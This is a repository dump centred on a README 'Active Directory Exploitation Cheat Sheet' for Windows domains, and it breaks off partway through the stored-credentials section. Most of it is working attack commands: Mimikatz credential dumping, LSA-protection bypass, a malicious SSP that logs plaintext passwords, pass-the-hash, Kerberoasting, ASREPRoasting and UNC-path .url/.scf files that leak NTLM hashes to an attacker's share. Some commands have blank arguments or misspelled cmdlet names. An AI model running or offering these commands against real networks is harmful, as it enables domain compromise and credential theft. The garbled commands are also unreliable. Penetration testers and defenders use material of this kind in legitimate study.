├── LICENSE
├── README.md
└── WalkTheDog.png
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2020 Nikos Katsiopis
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Active Directory Exploitation Cheat Sheet
2 |
3 | This cheat sheet contains common enumeration and attack methods for Windows Active Directory.
4 |
5 | This cheat sheet is inspired by the [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) repo.
6 |
7 | 
8 |
9 | ## Summary
10 |
11 | - [Active Directory Exploitation Cheat Sheet](#active-directory-exploitation-cheat-sheet)
12 | - [Summary](#summary)
13 | - [Tools](#tools)
14 | - [Domain Enumeration](#domain-enumeration)
15 | - [Using PowerView](#using-powerview)
16 | - [Using AD Module](#using-ad-module)
17 | - [Using BloodHound](#using-bloodhound)
18 | - [Remote BloodHound](#remote-bloodhound)
19 | - [On Site BloodHound](#on-site-bloodhound)
20 | - [Using Adalanche](#using-adalanche)
21 | - [Remote adalanche](#remote-adalanche)
22 | - [Export Enumerated Objects](#export-enumerated-objects)
23 | - [Useful Enumeration Tools](#useful-enumeration-tools)
24 | - [Local Privilege Escalation](#local-privilege-escalation)
25 | - [Useful Local Priv Esc Tools](#useful-local-priv-esc-tools)
26 | - [Lateral Movement](#lateral-movement)
27 | - [Powershell Remoting](#powershell-remoting)
28 | - [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials)
29 | - [Import a PowerShell Module and Execute its Functions Remotely](#import-a-powershell-module-and-execute-its-functions-remotely)
30 | - [Executing Remote Stateful commands](#executing-remote-stateful-commands)
31 | - [Mimikatz](#mimikatz)
32 | - [Remote Desktop Protocol](#remote-desktop-protocol)
33 | - [URL File Attacks](#url-file-attacks)
34 | - [Useful Tools](#useful-tools)
35 | - [Domain Privilege Escalation](#domain-privilege-escalation)
36 | - [Kerberoast](#kerberoast)
37 | - [ASREPRoast](#asreproast)
38 | - [Password Spray Attack](#password-spray-attack)
39 | - [Force Set SPN](#force-set-spn)
40 | - [Abusing Shadow Copies](#abusing-shadow-copies)
41 | - [List and Decrypt Stored Credentials using Mimikatz](#list-and-decrypt-stored-credentials-using-mimikatz)
42 | - [Unconstrained Delegation](#unconstrained-delegation)
43 | - [Constrained Delegation](#constrained-delegation)
44 | - [Resource Based Constrained Delegation](#resource-based-constrained-delegation)
45 | - [DNSAdmins Abuse](#dnsadmins-abuse)
46 | - [Abusing Active Directory-Integraded DNS](#abusing-active-directory-integraded-dns)
47 | - [Abusing Backup Operators Group](#abusing-backup-operators-group)
48 | - [Abusing Exchange](#abusing-exchange)
49 | - [Weaponizing Printer Bug](#weaponizing-printer-bug)
50 | - [Abusing ACLs](#abusing-acls)
51 | - [Abusing IPv6 with mitm6](#abusing-ipv6-with-mitm6)
52 | - [SID History Abuse](#sid-history-abuse)
53 | - [Exploiting SharePoint](#exploiting-sharepoint)
54 | - [Zerologon](#zerologon)
55 | - [PrintNightmare](#printnightmare)
56 | - [Active Directory Certificate Services](#active-directory-certificate-services)
57 | - [No PAC](#no-pac)
58 | - [Domain Persistence](#domain-persistence)
59 | - [Golden Ticket Attack](#golden-ticket-attack)
60 | - [DCsync Attack](#dcsync-attack)
61 | - [Silver Ticket Attack](#silver-ticket-attack)
62 | - [Skeleton Key Attack](#skeleton-key-attack)
63 | - [DSRM Abuse](#dsrm-abuse)
64 | - [Custom SSP](#custom-ssp)
65 | - [Cross Forest Attacks](#cross-forest-attacks)
66 | - [Trust Tickets](#trust-tickets)
67 | - [Abuse MSSQL Servers](#abuse-mssql-servers)
68 | - [Breaking Forest Trusts](#breaking-forest-trusts)
69 |
70 | ## Tools
71 |
72 | - [Powersploit](https://github.com/PowerShellMafia/PowerSploit/tree/dev)
73 | - [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL)
74 | - [Powermad](https://github.com/Kevin-Robertson/Powermad)
75 | - [Impacket](https://github.com/SecureAuthCorp/impacket)
76 | - [Mimikatz](https://github.com/gentilkiwi/mimikatz)
77 | - [Rubeus](https://github.com/GhostPack/Rubeus) -> [Compiled Version](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries)
78 | - [BloodHound](https://github.com/BloodHoundAD/BloodHound)
79 | - [AD Module](https://github.com/samratashok/ADModule)
80 | - [ASREPRoast](https://github.com/HarmJ0y/ASREPRoast)
81 | - [Adalanche](https://github.com/lkarlslund/adalanche)
82 |
83 | ## Domain Enumeration
84 |
85 | ### Using PowerView
86 |
87 | [Powerview v.3.0](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
88 | [Powerview Wiki](https://powersploit.readthedocs.io/en/latest/)
89 |
90 | - **Get Current Domain:** `Get-Domain`
91 | - **Enumerate Other Domains:** `Get-Domain -Domain `
92 | - **Get Domain SID:** `Get-DomainSID`
93 | - **Get Domain Policy:**
94 |
95 | ```powershell
96 | Get-DomainPolicy
97 |
98 | #Will show us the policy configurations of the Domain about system access or kerberos
99 | Get-DomainPolicy | Select-Object -ExpandProperty SystemAccess
100 | Get-DomainPolicy | Select-Object -ExpandProperty KerberosPolicy
101 | ```
102 |
103 | - **Get Domain Controllers:**
104 | ```powershell
105 | Get-DomainController
106 | Get-DomainController -Domain
107 | ```
108 | - **Enumerate Domain Users:**
109 |
110 | ```powershell
111 | #Save all Domain Users to a file
112 | Get-DomainUser | Out-File -FilePath .\DomainUsers.txt
113 |
114 | #Will return specific properties of a specific user
115 | Get-DomainUser -Identity [username] -Properties DisplayName, MemberOf | Format-List
116 |
117 | #Enumerate user logged on a machine
118 | Get-NetLoggedon -ComputerName
119 |
120 | #Enumerate Session Information for a machine
121 | Get-NetSession -ComputerName
122 |
123 | #Enumerate domain machines of the current/specified domain where specific users are logged into
124 | Find-DomainUserLocation -Domain | Select-Object UserName, SessionFromName
125 | ```
126 |
127 | - **Enum Domain Computers:**
128 |
129 | ```powershell
130 | Get-DomainComputer -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
131 |
132 | #Enumerate Live machines
133 | Get-DomainComputer -Ping -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
134 | ```
135 |
136 | - **Enum Groups and Group Members:**
137 |
138 | ```powershell
139 | #Save all Domain Groups to a file:
140 | Get-DomainGroup | Out-File -FilePath .\DomainGroup.txt
141 |
142 | #Return members of Specific Group (eg. Domain Admins & Enterprise Admins)
143 | Get-DomainGroup -Identity '' | Select-Object -ExpandProperty Member
144 | Get-DomainGroupMember -Identity '' | Select-Object MemberDistinguishedName
145 |
146 | #Enumerate the local groups on the local (or remote) machine. Requires local admin rights on the remote machine
147 | Get-NetLocalGroup | Select-Object GroupName
148 |
149 | #Enumerates members of a specific local group on the local (or remote) machine. Also requires local admin rights on the remote machine
150 | Get-NetLocalGroupMember -GroupName Administrators | Select-Object MemberName, IsGroup, IsDomain
151 |
152 | #Return all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences
153 | Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
154 | ```
155 |
156 | - **Enumerate Shares:**
157 |
158 | ```powershell
159 | #Enumerate Domain Shares
160 | Find-DomainShare
161 |
162 | #Enumerate Domain Shares the current user has access
163 | Find-DomainShare -CheckShareAccess
164 |
165 | #Enumerate "Interesting" Files on accessible shares
166 | Find-InterestingDomainShareFile -Include *passwords*
167 | ```
168 |
169 | - **Enum Group Policies:**
170 |
171 | ```powershell
172 | Get-DomainGPO -Properties DisplayName | Sort-Object -Property DisplayName
173 |
174 | #Enumerate all GPOs to a specific computer
175 | Get-DomainGPO -ComputerIdentity -Properties DisplayName | Sort-Object -Property DisplayName
176 |
177 | #Get users that are part of a Machine's local Admin group
178 | Get-DomainGPOComputerLocalGroupMapping -ComputerName
179 | ```
180 |
181 | - **Enum OUs:**
182 | ```powershell
183 | Get-DomainOU -Properties Name | Sort-Object -Property Name
184 | ```
185 | - **Enum ACLs:**
186 |
187 | ```powershell
188 | # Returns the ACLs associated with the specified account
189 | Get-DomaiObjectAcl -Identity -ResolveGUIDs
190 |
191 | #Search for interesting ACEs
192 | Find-InterestingDomainAcl -ResolveGUIDs
193 |
194 | #Check the ACLs associated with a specified path (e.g smb share)
195 | Get-PathAcl -Path "\\Path\Of\A\Share"
196 | ```
197 |
198 | - **Enum Domain Trust:**
199 |
200 | ```powershell
201 | Get-DomainTrust
202 | Get-DomainTrust -Domain
203 |
204 | #Enumerate all trusts for the current domain and then enumerates all trusts for each domain it finds
205 | Get-DomainTrustMapping
206 | ```
207 |
208 | - **Enum Forest Trust:**
209 |
210 | ```powershell
211 | Get-ForestDomain
212 | Get-ForestDomain -Forest
213 |
214 | #Map the Trust of the Forest
215 | Get-ForestTrust
216 | Get-ForestTrust -Forest
217 | ```
218 |
219 | - **User Hunting:**
220 |
221 | ```powershell
222 | #Finds all machines on the current domain where the current user has local admin access
223 | Find-LocalAdminAccess -Verbose
224 |
225 | #Find local admins on all machines of the domain
226 | Find-DomainLocalGroupMember -Verbose
227 |
228 | #Find computers were a Domain Admin OR a specified user has a session
229 | Find-DomainUserLocation | Select-Object UserName, SessionFromName
230 |
231 | #Confirming admin access
232 | Test-AdminAccess
233 | ```
234 |
235 | :heavy_exclamation_mark: **Priv Esc to Domain Admin with User Hunting:** \
236 | I have local admin access on a machine -> A Domain Admin has a session on that machine -> I steal his token and impersonate him -> Profit!
237 |
238 | ### Using AD Module
239 |
240 | - **Get Current Domain:** `Get-ADDomain`
241 | - **Enum Other Domains:** `Get-ADDomain -Identity `
242 | - **Get Domain SID:** `Get-DomainSID`
243 | - **Get Domain Controlers:**
244 |
245 | ```powershell
246 | Get-ADDomainController
247 | Get-ADDomainController -Identity
248 | ```
249 |
250 | - **Enumerate Domain Users:**
251 |
252 | ```powershell
253 | Get-ADUser -Filter * -Identity -Properties *
254 |
255 | #Get a specific "string" on a user's attribute
256 | Get-ADUser -Filter 'Description -like "*wtver*"' -Properties Description | select Name, Description
257 | ```
258 |
259 | - **Enum Domain Computers:**
260 | ```powershell
261 | Get-ADComputer -Filter * -Properties *
262 | Get-ADGroup -Filter *
263 | ```
264 | - **Enum Domain Trust:**
265 | ```powershell
266 | Get-ADTrust -Filter *
267 | Get-ADTrust -Identity
268 | ```
269 | - **Enum Forest Trust:**
270 |
271 | ```powershell
272 | Get-ADForest
273 | Get-ADForest -Identity
274 |
275 | #Domains of Forest Enumeration
276 | (Get-ADForest).Domains
277 | ```
278 |
279 | - **Enum Local AppLocker Effective Policy:**
280 |
281 | ```powershell
282 | Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
283 | ```
284 |
285 | ### Using BloodHound
286 |
287 | #### Remote BloodHound
288 |
289 | [Python BloodHound Repository](https://github.com/fox-it/BloodHound.py) or install it with `pip3 install bloodhound`
290 |
291 | ```powershell
292 | bloodhound-python -u -p -ns -d -c All
293 | ```
294 |
295 | #### On Site BloodHound
296 |
297 | ```powershell
298 | #Using exe ingestor
299 | .\SharpHound.exe --CollectionMethod All --LdapUsername --LdapPassword --domain --domaincontroller --OutputDirectory
300 |
301 | #Using PowerShell module ingestor
302 | . .\SharpHound.ps1
303 | Invoke-BloodHound -CollectionMethod All --LdapUsername --LdapPassword --OutputDirectory
304 | ```
305 |
306 | ### Using Adalanche
307 |
308 | #### Remote Adalanche
309 |
310 | ```bash
311 | # kali linux:
312 | ./adalanche collect activedirectory --domain \
313 | --username --password \
314 | --server
315 |
316 | # Example:
317 | ./adalanche collect activedirectory --domain windcorp.local \
318 | --username spoNge369@windcorp.local --password 'password123!' \
319 | --server dc.windcorp.htb
320 | ## -> Terminating successfully
321 |
322 | ## Any error?:
323 |
324 | # LDAP Result Code 200 "Network Error": x509: certificate signed by unknown authority ?
325 |
326 | ./adalanche collect activedirectory --domain windcorp.local \
327 | --username spoNge369@windcorp.local --password 'password123!' \
328 | --server dc.windcorp.htb --tlsmode NoTLS --port 389
329 |
330 | # Invalid Credentials ?
331 | ./adalanche collect activedirectory --domain windcorp.local \
332 | --username spoNge369@windcorp.local --password 'password123!' \
333 | --server dc.windcorp.htb --tlsmode NoTLS --port 389 \
334 | --authmode basic
335 |
336 | # Analyze data
337 | # go to web browser -> 127.0.0.1:8080
338 | ./adalanche analyze
339 | ```
340 |
341 | #### Export Enumerated Objects
342 |
343 | You can export enumerated objects from any module/cmdlet into an XML file for later ananlysis.
344 |
345 | The `Export-Clixml` cmdlet creates a Common Language Infrastructure (CLI) XML-based representation of an object or objects and stores it in a file. You can then use the `Import-Clixml` cmdlet to recreate the saved object based on the contents of that file.
346 |
347 | ```powershell
348 | # Export Domain users to xml file.
349 | Get-DomainUser | Export-CliXml .\DomainUsers.xml
350 |
351 | # Later, when you want to utilise them for analysis even on any other machine.
352 | $DomainUsers = Import-CliXml .\DomainUsers.xml
353 |
354 | # You can now apply any condition, filters, etc.
355 |
356 | $DomainUsers | select name
357 |
358 | $DomainUsers | ? {$_.name -match "User's Name"}
359 | ```
360 |
361 | ### Useful Enumeration Tools
362 |
363 | - [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) Information dumper via LDAP
364 | - [adidnsdump](https://github.com/dirkjanm/adidnsdump) Integrated DNS dumping by any authenticated user
365 | - [ACLight](https://github.com/cyberark/ACLight) Advanced Discovery of Privileged Accounts
366 | - [ADRecon](https://github.com/sense-of-security/ADRecon) Detailed Active Directory Recon Tool
367 |
368 | ## Local Privilege Escalation
369 |
370 | - [Windows Local Privilege Escalation Cookbook](https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook) Cookbook for Windows Local Privilege Escalations
371 |
372 | - [Juicy Potato](https://github.com/ohpe/juicy-potato) Abuse SeImpersonate or SeAssignPrimaryToken Privileges for System Impersonation
373 |
374 | :warning: Works only until Windows Server 2016 and Windows 10 until patch 1803
375 |
376 | - [Lovely Potato](https://github.com/TsukiCTF/Lovely-Potato) Automated Juicy Potato
377 |
378 | :warning: Works only until Windows Server 2016 and Windows 10 until patch 1803
379 |
380 | - [PrintSpoofer](https://github.com/itm4n/PrintSpoofer) Exploit the PrinterBug for System Impersonation
381 |
382 | :pray: Works for Windows Server 2019 and Windows 10
383 |
384 | - [RoguePotato](https://github.com/antonioCoco/RoguePotato) Upgraded Juicy Potato
385 |
386 | :pray: Works for Windows Server 2019 and Windows 10
387 |
388 | - [Abusing Token Privileges](https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/)
389 | - [SMBGhost CVE-2020-0796](https://blog.zecops.com/vulnerabilities/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/) \
390 | [PoC](https://github.com/danigargu/CVE-2020-0796)
391 | - [CVE-2021-36934 (HiveNightmare/SeriousSAM)](https://github.com/cube0x0/CVE-2021-36934)
392 |
393 | ### Useful Local Priv Esc Tools
394 |
395 | - [PowerUp](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Privesc/PowerUp.ps1) Misconfiguration Abuse
396 | - [BeRoot](https://github.com/AlessandroZ/BeRoot) General Priv Esc Enumeration Tool
397 | - [Privesc](https://github.com/enjoiz/Privesc) General Priv Esc Enumeration Tool
398 | - [FullPowers](https://github.com/itm4n/FullPowers) Restore A Service Account's Privileges
399 |
400 | ## Lateral Movement
401 |
402 | ### PowerShell Remoting
403 |
404 | ```powershell
405 | #Enable PowerShell Remoting on current Machine (Needs Admin Access)
406 | Enable-PSRemoting
407 |
408 | #Entering or Starting a new PSSession (Needs Admin Access)
409 | $sess = New-PSSession -ComputerName
410 | Enter-PSSession -ComputerName OR -Sessions
411 | ```
412 |
413 | ### Remote Code Execution with PS Credentials
414 |
415 | ```powershell
416 | $SecPassword = ConvertTo-SecureString '' -AsPlainText -Force
417 | $Cred = New-Object System.Management.Automation.PSCredential('htb.local\', $SecPassword)
418 | Invoke-Command -ComputerName -Credential $Cred -ScriptBlock {whoami}
419 | ```
420 |
421 | ### Import a PowerShell Module and Execute its Functions Remotely
422 |
423 | ```powershell
424 | #Execute the command and start a session
425 | Invoke-Command -Credential $cred -ComputerName -FilePath c:\FilePath\file.ps1 -Session $sess
426 |
427 | #Interact with the session
428 | Enter-PSSession -Session $sess
429 |
430 | ```
431 |
432 | ### Executing Remote Stateful commands
433 |
434 | ```powershell
435 | #Create a new session
436 | $sess = New-PSSession -ComputerName
437 |
438 | #Execute command on the session
439 | Invoke-Command -Session $sess -ScriptBlock {$ps = Get-Process}
440 |
441 | #Check the result of the command to confirm we have an interactive session
442 | Invoke-Command -Session $sess -ScriptBlock {$ps}
443 | ```
444 |
445 | ### Mimikatz
446 |
447 | ```powershell
448 | #The commands are in cobalt strike format!
449 |
450 | #Dump LSASS:
451 | mimikatz privilege::debug
452 | mimikatz token::elevate
453 | mimikatz sekurlsa::logonpasswords
454 |
455 | #(Over) Pass The Hash
456 | mimikatz privilege::debug
457 | mimikatz sekurlsa::pth /user: /ntlm:<> /domain:
458 |
459 | #List all available kerberos tickets in memory
460 | mimikatz sekurlsa::tickets
461 |
462 | #Dump local Terminal Services credentials
463 | mimikatz sekurlsa::tspkg
464 |
465 | #Dump and save LSASS in a file
466 | mimikatz sekurlsa::minidump c:\temp\lsass.dmp
467 |
468 | #List cached MasterKeys
469 | mimikatz sekurlsa::dpapi
470 |
471 | #List local Kerberos AES Keys
472 | mimikatz sekurlsa::ekeys
473 |
474 | #Dump SAM Database
475 | mimikatz lsadump::sam
476 |
477 | #Dump SECRETS Database
478 | mimikatz lsadump::secrets
479 |
480 | #Inject and dump the Domain Controler's Credentials
481 | mimikatz privilege::debug
482 | mimikatz token::elevate
483 | mimikatz lsadump::lsa /inject
484 |
485 | #Dump the Domain's Credentials without touching DC's LSASS and also remotely
486 | mimikatz lsadump::dcsync /domain: /all
487 |
488 | #Dump old passwords and NTLM hashes of a user
489 | mimikatz lsadump::dcsync /user:\ /history
490 |
491 | #List and Dump local kerberos credentials
492 | mimikatz kerberos::list /dump
493 |
494 | #Pass The Ticket
495 | mimikatz kerberos::ptt
496 |
497 | #List TS/RDP sessions
498 | mimikatz ts::sessions
499 |
500 | #List Vault credentials
501 | mimikatz vault::list
502 | ```
503 |
504 | :exclamation: What if mimikatz fails to dump credentials because of LSA Protection controls ?
505 |
506 | - LSA as a Protected Process (Kernel Land Bypass)
507 |
508 | ```powershell
509 | #Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1
510 | reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
511 |
512 | #Next upload the mimidriver.sys from the official mimikatz repo to same folder of your mimikatz.exe
513 | #Now lets import the mimidriver.sys to the system
514 | mimikatz # !+
515 |
516 | #Now lets remove the protection flags from lsass.exe process
517 | mimikatz # !processprotect /process:lsass.exe /remove
518 |
519 | #Finally run the logonpasswords function to dump lsass
520 | mimikatz # sekurlsa::logonpasswords
521 | ```
522 |
523 | - LSA as a Protected Process (Userland "Fileless" Bypass)
524 |
525 | - [PPLdump](https://github.com/itm4n/PPLdump)
526 | - [Bypassing LSA Protection in Userland](https://blog.scrt.ch/2021/04/22/bypassing-lsa-protection-in-userland)
527 |
528 | - LSA is running as virtualized process (LSAISO) by Credential Guard
529 |
530 | ```powershell
531 | #Check if a process called lsaiso.exe exists on the running processes
532 | tasklist |findstr lsaiso
533 |
534 | #If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data.
535 | #Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides
536 | mimikatz # misc::memssp
537 |
538 | #Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log
539 | ```
540 |
541 | - [Detailed Mimikatz Guide](https://adsecurity.org/?page_id=1821)
542 | - [Poking Around With 2 lsass Protection Options](https://medium.com/red-teaming-with-a-blue-team-mentaility/poking-around-with-2-lsass-protection-options-880590a72b1a)
543 |
544 | ### Remote Desktop Protocol
545 |
546 | If the host we want to lateral move to has "RestrictedAdmin" enabled, we can pass the hash using the RDP protocol and get an interactive session without the plaintext password.
547 |
548 | - Mimikatz:
549 |
550 | ```powershell
551 | #We execute pass-the-hash using mimikatz and spawn an instance of mstsc.exe with the "/restrictedadmin" flag
552 | privilege::debug
553 | sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin"
554 |
555 | #Then just click ok on the RDP dialogue and enjoy an interactive session as the user we impersonated
556 | ```
557 |
558 | - xFreeRDP:
559 |
560 | ```powershell
561 | xfreerdp +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore /bpp:8 /u: /pth: /v:
562 | ```
563 |
564 | :exclamation: If Restricted Admin mode is disabled on the remote machine we can connect on the host using another tool/protocol like psexec or winrm and enable it by creating the following registry key and setting it's value zero: "HKLM:\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin".
565 |
566 | - Bypass "Single Session per User" Restriction
567 |
568 | On a domain computer, if you have command execution as the system or local administrator and want an RDP session that another user is already using, you can get around the single session restriction by adding the following registry key:
569 | ```powershell
570 | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0
571 | ```
572 |
573 | Once you've completed the desired stuff, you can delete the key to reinstate the single-session-per-user restriction.
574 | ```powershell
575 | REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUse
576 | ```
577 |
578 |
579 | ### URL File Attacks
580 |
581 | - .url file
582 |
583 | ```
584 | [InternetShortcut]
585 | URL=whatever
586 | WorkingDirectory=whatever
587 | IconFile=\\\%USERNAME%.icon
588 | IconIndex=1
589 | ```
590 |
591 | ```
592 | [InternetShortcut]
593 | URL=file:///leak/leak.html
594 | ```
595 |
596 | - .scf file
597 |
598 | ```
599 | [Shell]
600 | Command=2
601 | IconFile=\\\Share\test.ico
602 | [Taskbar]
603 | Command=ToggleDesktop
604 | ```
605 |
606 | Putting these files in a writeable share the victim only has to open the file explorer and navigate to the share. **Note** that the file doesn't need to be opened or the user to interact with it, but it must be on the top of the file system or just visible in the windows explorer window in order to be rendered. Use responder to capture the hashes.
607 |
608 | :exclamation: .scf file attacks won't work on the latest versions of Windows.
609 |
610 | ### Useful Tools
611 |
612 | - [Powercat](https://github.com/besimorhino/powercat) netcat written in powershell, and provides tunneling, relay and portforward
613 | capabilities.
614 | - [SCShell](https://github.com/Mr-Un1k0d3r/SCShell) fileless lateral movement tool that relies on ChangeServiceConfigA to run command
615 | - [Evil-Winrm](https://github.com/Hackplayers/evil-winrm) the ultimate WinRM shell for hacking/pentesting
616 | - [RunasCs](https://github.com/antonioCoco/RunasCs) Csharp and open version of windows builtin runas.exe
617 | - [ntlm_theft](https://github.com/Greenwolf/ntlm_theft.git) creates all possible file formats for url file attacks
618 |
619 | ## Domain Privilege Escalation
620 |
621 | ### Kerberoast
622 |
623 | _WUT IS DIS?:_ \
624 | All standard domain users can request a copy of all service accounts along with their correlating password hashes, so we can ask a TGS for any SPN that is bound to a "user"
625 | account, extract the encrypted blob that was encrypted using the user's password and bruteforce it offline.
626 |
627 | - PowerView:
628 |
629 | ```powershell
630 | #Get User Accounts that are used as Service Accounts
631 | Get-NetUser -SPN
632 |
633 | #Get every available SPN account, request a TGS and dump its hash
634 | Invoke-Kerberoast
635 |
636 | #Requesting the TGS for a single account:
637 | Request-SPNTicket
638 |
639 | #Export all tickets using Mimikatz
640 | Invoke-Mimikatz -Command '"kerberos::list /export"'
641 | ```
642 |
643 | - AD Module:
644 |
645 | ```powershell
646 | #Get User Accounts that are used as Service Accounts
647 | Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
648 | ```
649 |
650 | - Impacket:
651 |
652 | ```powershell
653 | python GetUserSPNs.py /: -outputfile
654 | ```
655 |
656 | - Rubeus:
657 |
658 | ```powershell
659 | #Kerberoasting and outputing on a file with a specific format
660 | Rubeus.exe kerberoast /outfile: /domain:
661 |
662 | #Kerberoasting whle being "OPSEC" safe, essentially while not try to roast AES enabled accounts
663 | Rubeus.exe kerberoast /outfile: /domain: /rc4opsec
664 |
665 | #Kerberoast AES enabled accounts
666 | Rubeus.exe kerberoast /outfile: /domain: /aes
667 |
668 | #Kerberoast specific user account
669 | Rubeus.exe kerberoast /outfile: /domain: /user: /simple
670 |
671 | #Kerberoast by specifying the authentication credentials
672 | Rubeus.exe kerberoast /outfile: /domain: /creduser: /credpassword:
673 | ```
674 |
675 | ### ASREPRoast
676 |
677 | _WUT IS DIS?:_ \
678 | If a domain user account do not require kerberos preauthentication, we can request a valid TGT for this account without even having domain credentials, extract the encrypted
679 | blob and bruteforce it offline.
680 |
681 | - PowerView: `Get-DomainUser -PreauthNotRequired -Verbose`
682 | - AD Module: `Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth`
683 |
684 | Forcefully Disable Kerberos Preauth on an account i have Write Permissions or more!
685 | Check for interesting permissions on accounts:
686 |
687 | **Hint:** We add a filter e.g. RDPUsers to get "User Accounts" not Machine Accounts, because Machine Account hashes are not crackable!
688 |
689 | PowerView:
690 |
691 | ```powershell
692 | Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
693 | Disable Kerberos Preauth:
694 | Set-DomainObject -Identity -XOR @{useraccountcontrol=4194304} -Verbose
695 | Check if the value changed:
696 | Get-DomainUser -PreauthNotRequired -Verbose
697 | ```
698 |
699 | - And finally execute the attack using the [ASREPRoast](https://github.com/HarmJ0y/ASREPRoast) tool.
700 |
701 | ```powershell
702 | #Get a specific Accounts hash:
703 | Get-ASREPHash -UserName -Verbose
704 |
705 | #Get any ASREPRoastable Users hashes:
706 | Invoke-ASREPRoast -Verbose
707 | ```
708 |
709 | - Using Rubeus:
710 |
711 | ```powershell
712 | #Trying the attack for all domain users
713 | Rubeus.exe asreproast /format: /domain: /outfile:
714 |
715 | #ASREPRoast specific user
716 | Rubeus.exe asreproast /user: /format: /domain: /outfile:
717 |
718 | #ASREPRoast users of a specific OU (Organization Unit)
719 | Rubeus.exe asreproast /ou: /format: /domain: /outfile:
720 | ```
721 |
722 | - Using Impacket:
723 |
724 | ```powershell
725 | #Trying the attack for the specified users on the file
726 | python GetNPUsers.py / -usersfile -outputfile
727 | ```
728 |
729 | ### Password Spray Attack
730 |
731 | If we have harvest some passwords by compromising a user account, we can use this method to try and exploit password reuse
732 | on other domain accounts.
733 |
734 | **Tools:**
735 |
736 | - [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray)
737 | - [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
738 | - [Invoke-CleverSpray](https://github.com/wavestone-cdt/Invoke-CleverSpray)
739 | - [Spray](https://github.com/Greenwolf/Spray)
740 |
741 | ### Force Set SPN
742 |
743 | _WUT IS DIS ?:
744 | If we have enough permissions -> GenericAll/GenericWrite we can set a SPN on a target account, request a TGS, then grab its blob and bruteforce it._
745 |
746 | - PowerView:
747 |
748 | ```powershell
749 | #Check for interesting permissions on accounts:
750 | Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
751 |
752 | #Check if current user has already an SPN setted:
753 | Get-DomainUser -Identity | select serviceprincipalname
754 |
755 | #Force set the SPN on the account:
756 | Set-DomainObject -Set @{serviceprincipalname='ops/whatever1'}
757 | ```
758 |
759 | - AD Module:
760 |
761 | ```powershell
762 | #Check if current user has already an SPN setted
763 | Get-ADUser -Identity -Properties ServicePrincipalName | select ServicePrincipalName
764 |
765 | #Force set the SPN on the account:
766 | Set-ADUser -Identiny -ServicePrincipalNames @{Add='ops/whatever1'}
767 | ```
768 |
769 | Finally use any tool from before to grab the hash and kerberoast it!
770 |
771 | ### Abusing Shadow Copies
772 |
773 | If you have local administrator access on a machine try to list shadow copies, it's an easy way for Domain Escalation.
774 |
775 | ```powershell
776 | #List shadow copies using vssadmin (Needs Admnistrator Access)
777 | vssadmin list shadows
778 |
779 | #List shadow copies using diskshadow
780 | diskshadow list shadows all
781 |
782 | #Make a symlink to the shadow copy and access it
783 | mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
784 | ```
785 |
786 | 1. You can dump the backuped SAM database and harvest credentials.
787 | 2. Look for DPAPI stored creds and decrypt them.
788 | 3. Access backuped sensitive files.
789 |
790 | ### List and Decrypt Stored Credentials using Mimikatz
791 |
792 | Usually encrypted credentials are stored in:
793 |
794 | - `%appdata%\Microsoft\Credentials`
795 | - `%localappdata%\Microsoft\Credentials`
796 |
797 | ```powershell
798 | #By using the cred function of mimikatz we can enumerate the cred object and get information about it:
